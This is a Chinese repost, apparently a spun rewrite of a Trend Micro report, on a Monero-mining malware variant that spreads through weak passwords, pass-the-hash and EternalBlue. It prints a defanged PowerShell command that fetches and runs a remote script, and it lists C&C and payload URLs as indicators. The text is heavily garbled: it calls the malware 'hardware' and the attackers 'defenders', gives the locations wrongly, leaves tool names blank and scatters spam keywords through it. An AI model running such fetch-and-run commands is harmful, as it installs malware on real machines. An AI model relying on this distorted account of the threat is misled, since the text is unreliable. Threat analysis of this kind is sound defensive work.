挖矿app 趋势科技新变种通过多种传播感染方法在系统和服务器中逃避检测

挖矿app 趋势科技新变种通过多种传播感染方法在系统和服务器中逃避检测

趋势科技曾在2019年初在美国的台湾、台湾和澳门地区发觉了一类新的门罗币挖矿蓄意硬件变种，此蓄意硬件通过多种传播传染方式在系统和服务器中借机植入加密本币挖矿机。在我们之前观测的样本中，其传染模式包括弱密码检测，以及使用哈希传递技术、管理工具，和公开可用代码进行暴力防御。但是最近，我们在美国发觉了此蓄意硬件的新变种，防御者在其中通过运用“永恒之蓝”漏洞和脚本来入侵系统并逃避检查。

同时，我们的遥测技术显示，目前不仅日本和台湾此外，在新加坡、越南、印度等地也出现了这类恐吓，由此来看，防御者正将僵尸网路扩散到其他国家和地区。

传播与行为

此蓄意硬件（由趋势科技监测为.PS1..A）的主要传播技术是在受传染的机器上，按照弱密码列表来尝试登陆网路中连结的其他计算机。蓄意硬件并非直接将远程命令发送到所连结的系统中去，而是先修改受传染计算机的防火墙和端口转发设置，并设置一个计划任务来下载和执行更新后的蓄意硬件副本。下载好的副本是个脚本，由下述命令执行：

IEX(New-.).(‘hxxp://v.beahh[.]com/wm?hp’)

表1.弱密码列表。

蓄意硬件运用此表以及-(由趋势科技监测为.Win32..AI)来远程访问其他计算机：

图1.-，适于远程访问设置的是弱密码的计算机。

蓄意硬件还使用哈希传递方式，通过用户的哈希密码向远程服务器验证自己身分。这些步骤的方法是，蓄意硬件首先通过使用Get-命令获取储存在计算机中的哈希值，同时也有里面列举的弱密码列表的哈希值；获取哈希值后，蓄意硬件使用invok-(另一个公开可用的脚本)通过哈希传递来执行文件共享操作。

图2.使用哈希传递技术获取用户密码哈希值和弱密码哈希值。

假如成功，它将删掉文件％StartMenu％\\\run.bat，此文件或许是植入的旧版本蓄意硬件文件，它还删掉以下内容：

·％Data％\.tmp

·％Data％\sign.txt-适于指示计算机已被传染

·%StartMenu%\\\.lnk-负责在启动时执行tmp脚本

假如用户使用的是强密码，则蓄意硬件运用“永恒之蓝”进行传播。

图3.漏洞运用的相关有效负载。

通过上述方式传染计算机后，蓄意硬件将获取MAC地址并搜集有关计算机中安装的防病毒产品的信息。它从C＆C服务器下载另一个混淆的脚本（趋势科技监测为.PS1..B），并将获取的信息发回。下载的是一个，负责下载和执行蓄意硬件的组件，其中大部份是自身的副本。

图4.获取MAC地址和AV产品的例行程序。

蓄意硬件为了检测是否早已安装其组件，会寻求以下文件:

·%Temp%\kkk1.log

·%Temp%\pp2.log

·%Temp%\333.log

·%Temp%\kk4.log

·%Temp%\kk5.log

图5.检测是否已安装的蓄意硬件组件。

每位$flagX代表一个组件。上述的脚本就是第一个组件$flag，蓄意硬件通过安装一个计划任务来定期运行此脚本并检测更新。蓄意硬件的行为则取决于此脚本运行时的权限。第二个组件$flag2可以从不同的URL地址处下载蓄意硬件的副本，并争创一个不同名称的调度任务。

图6.组件$flag和$flag2。

第三个组件（由趋势科技监测为.Win32..）是一个植入的木马程序——一份更大文件规格的自身副本，或许会逃避沙箱测试，并从主机搜集系统信息，包括：

·电脑名称

·机器的GUID

·MAC地址

·操作系统版本

·图像显存信息

·系统时间

第四个组件是编译的二补码可执行文件挖矿app，它能逐步传播蓄意硬件，还能否通过植入和执行的实现（由趋势科技监测为.PS1..ADW）来传递哈希防御。

图7.植入的第四个可执行组件。

图8.检测是否早已安装了组件，并执行。

蓄意硬件都会企图使用弱SQL密码来访问数据库服务器，访问时使用的是来执行shell命令。与主文件一样，该组件通过重用与以往漏洞运用相关的公共可用代码，扫描可通过“永恒之蓝”利用的易受防御设备的IP块。

图9.扫描易受防御的数据库服务器。

第五个组件是一个可执行文件，可下载并执行。因此，在编写本文时下载的URL处于脱机状态。

蓄意硬件的有效负载——门罗币挖矿机——也由布署，但不是储存在文件中，而是被注入到自己的进程中，并使用另一个公开可用的代码-n。安装完成后挖矿app，蓄意硬件会向C&C服务器报告其状态。

图10.下载并执行挖矿机有效负载的脚本。

图11.执行挖矿机的有效负载。

推论

蓄意硬件的设计十分复杂。它借助计算机系统和数据库中的弱密码，针对公司或许仍在使用的遗留硬件，使用基于的脚本，在显存中下载和执行组件；并运用未修复的漏洞，以及使用启动文件夹和任务调度程序进行安装。考虑到及开源代码的逐渐普及，我们预计会在不远的将来看到更多更复杂的蓄意硬件。似乎与直接泄露个人身分信息相比，搜集系统信息并发送回C＆C或许看上去微不足道，但系统信息对于每台机器来说是独一无二的，可适于跟踪，辨识和跟踪用户和活动。

图12.蓄意硬件新的URL地址。

我们建议用户尽早使用来自合法供应商的可用补丁更新系统。安装旧版本硬件的用户还应当使用靠谱来源的虚拟补丁进行更新。我们在编写本文时，蓄意硬件仍处于活动状态，并已更新URL地址。同时，建议用户最好能使用复杂点的密码，并尽或许授权分层身分验证。对企业来说，应启用一个单层保护系统，能有效制止这种恐吓。

IoC

URLs

hxxp://down[.]beahh[.]com/c32.dat

hxxp://down[.]beahh[.]com/new.dat?allv5

hxxp://ii[.]ackng[.]com/t.php?ID={}&GUID={GUID}&MAC={}&OS={&BIT={32/64}&CARD={}&_T={TIME}

hxxp://log[.]beahh[.]com/.php?ver=5p?src=wm&

hxxp://oo[.]beahh[.]com/t.php?ID={}&GUID={GUID}&MAC={}&OS={&BIT={32/64}&CARD={}&_T={TIME}

hxxp://p[.]beahh[.]com/.php

hxxp://pp[.]abbny[.]com/t.php?ID={}&GUID={GUID}&MAC={}&OS={&BIT={32/64}&CARD={}&_T={TIME}

hxxp://v[.]beahh[.]com/wm?hp

hxxp://v[.]y6h[.]net/g?h

hxxp://v[.]y6h[.]net/g?l

lplp1[.]abbny[.]com:443

lplp1[.]ackng[.]com:443

lplp1[.]beahh[.]com:443

标签： 趋势科技 哈希